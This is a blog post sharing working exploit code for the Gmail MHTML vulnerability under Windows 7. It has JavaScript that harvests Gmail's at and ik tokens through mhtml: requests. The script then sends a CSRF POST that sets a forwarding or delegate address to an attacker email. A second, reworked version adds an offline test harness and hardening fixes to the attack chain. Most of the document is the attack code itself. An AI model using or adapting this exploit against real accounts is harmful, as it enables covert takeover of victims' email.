A piece of exploit code for the Gmail MHTML vulnerability under Win7


It has been a long time since I updated this blog. I dug out a piece of Gmail MHTML vulnerability test code for Win7; the last finished version is nowhere to be found now.

MHTML vulnerability under Win7
When initiating the AJAX request, unlike XP where the http(s): URL can be requested directly, on Win7 the requested URL must itself use the mhtml: protocol; otherwise the request is refused with a permission error. The same-origin policy under Win7 seems stricter than on XP. I don't know whether anyone else has noticed this detail.

To carry out CSRF against Gmail actions that require authorization, the request must carry both the at and ik parameters to succeed. There are many ways to obtain these two values: they can be read from the cookie or scraped directly from the page. The code below takes them from the page: the at token from the basic-HTML view (/mail/h/0/) and the ik value from the GLOBALS array of the standard view. Note that every URL, including the final POST, keeps the mhtml: prefix.

// Tmail: the e-mail address submitted in the final request. The original post
// leaves it undefined; the value here is a placeholder to be set by the attacker.
var Tmail = "attacker@example.com";

var XMLHttp = new ActiveXObject("Microsoft.XMLHTTP");

// Step 1: fetch the basic-HTML Gmail view over mhtml: and read the at token
XMLHttp.open("GET", "mhtml:https://mail.google.com/mail/h/0/", true);
XMLHttp.onreadystatechange = function() {
    if (XMLHttp.readyState == 4 && XMLHttp.status == 200) {
        var REX = /href=".*?at=(.{34})">/.exec(XMLHttp.responseText);
        var AThash = REX[1];

        // Step 2: fetch the standard Gmail view and read ik from the GLOBALS array
        XMLHttp.open("GET", "mhtml:https://mail.google.com/mail/", true);
        XMLHttp.onreadystatechange = function() {
            if (XMLHttp.readyState == 4 && XMLHttp.status == 200) {
                REX = /GLOBALS=\[.*?,"(.{10})",/.exec(XMLHttp.responseText);
                var IKhash = REX[1];

                // Step 3: the CSRF POST carrying both tokens, still over mhtml:
                XMLHttp.open("POST", "mhtml:https://mail.google.com/mail/?ui=2&ik=" + IKhash + "&view=mdlg&at=" + AThash, true);
                XMLHttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
                XMLHttp.send("mdrp=1&mda=%0D%0A" + Tmail + "%0D%0A");
            }
        };
        XMLHttp.send();
    }
};
XMLHttp.send();
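The same three-step chain, restructured as an added example so that the token harvesting can be exercised offline (this is not code from the original post). The regexes, URLs and parameter names are the page's; the request function is pluggable, and the Gmail responses below are constructed stand-ins, not real Gmail markup. On Win7 the transport would wrap the IE XMLHTTP object, and every URL keeps the mhtml: prefix, which the example also does.

```javascript
// Added example (not from the original post): the page's at/ik harvesting and
// CSRF POST as one synchronous chain over a pluggable transport, so the token
// extraction can be checked offline against constructed responses.

var MHTML = "mhtml:";                          // Win7: every XHR URL must use mhtml:
var BASE = "https://mail.google.com/mail/";

// Regexes as on the page. Both hard-code the token length (34 and 10 chars),
// so any change in Gmail's token format silently breaks the chain.
var AT_RE = /href=".*?at=(.{34})">/;
var IK_RE = /GLOBALS=\[.*?,"(.{10})",/;

function extractAt(html) {
  var m = AT_RE.exec(html);
  return m ? m[1] : null;
}

function extractIk(html) {
  var m = IK_RE.exec(html);
  return m ? m[1] : null;
}

// transport(method, url, body) returns the response text synchronously.
// On IE this would wrap Microsoft.XMLHTTP opened with async=false.
function runChain(transport, tmail) {
  var at = extractAt(transport("GET", MHTML + BASE + "h/0/", null));
  if (!at) throw new Error("at token not found in basic-HTML view");

  var ik = extractIk(transport("GET", MHTML + BASE, null));
  if (!ik) throw new Error("ik value not found in GLOBALS");

  var url = MHTML + BASE + "?ui=2&ik=" + ik + "&view=mdlg&at=" + at;
  // The page concatenates Tmail raw; encodeURIComponent is used here so that
  // '+' or '&' in the address cannot corrupt the form body.
  var body = "mdrp=1&mda=%0D%0A" + encodeURIComponent(tmail) + "%0D%0A";
  transport("POST", url, body);
  return { at: at, ik: ik, url: url, body: body };
}

// Fake transport: answers from a table keyed by "METHOD url" and records
// every request, so the full chain can be inspected without a network.
function makeFakeTransport(responses) {
  var log = [];
  function transport(method, url, body) {
    log.push({ method: method, url: url, body: body });
    var key = method + " " + url;
    if (!(key in responses)) throw new Error("unexpected request: " + key);
    return responses[key];
  }
  transport.log = log;
  return transport;
}

// Constructed stand-ins for the two Gmail pages (not real Gmail markup).
var FAKE_AT = "AF6bup" + "A".repeat(28);      // 34 chars, like the at token
var FAKE_IK = "0123456789";                    // 10 chars, like the ik value

function demo() {
  var responses = {};
  responses["GET " + MHTML + BASE + "h/0/"] =
    '<a href="?&at=' + FAKE_AT + '">Sign out</a>';
  responses["GET " + MHTML + BASE] =
    'var GLOBALS=[0,"mail","' + FAKE_IK + '","x"];';
  responses["POST " + MHTML + BASE + "?ui=2&ik=" + FAKE_IK + "&view=mdlg&at=" + FAKE_AT] = "";

  var t = makeFakeTransport(responses);
  var result = runChain(t, "attacker@example.com");
  result.requests = t.log;   // three requests: GET, GET, POST
  return result;
}
```

Running demo() shows the order of the chain and the exact POST the page ends with. The fixed-length captures are the fragile part: if either regex misses, runChain stops before the POST instead of sending a request with an undefined token, which the original nested callbacks would do.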

Copyright © Windows knowledge All Rights Reserved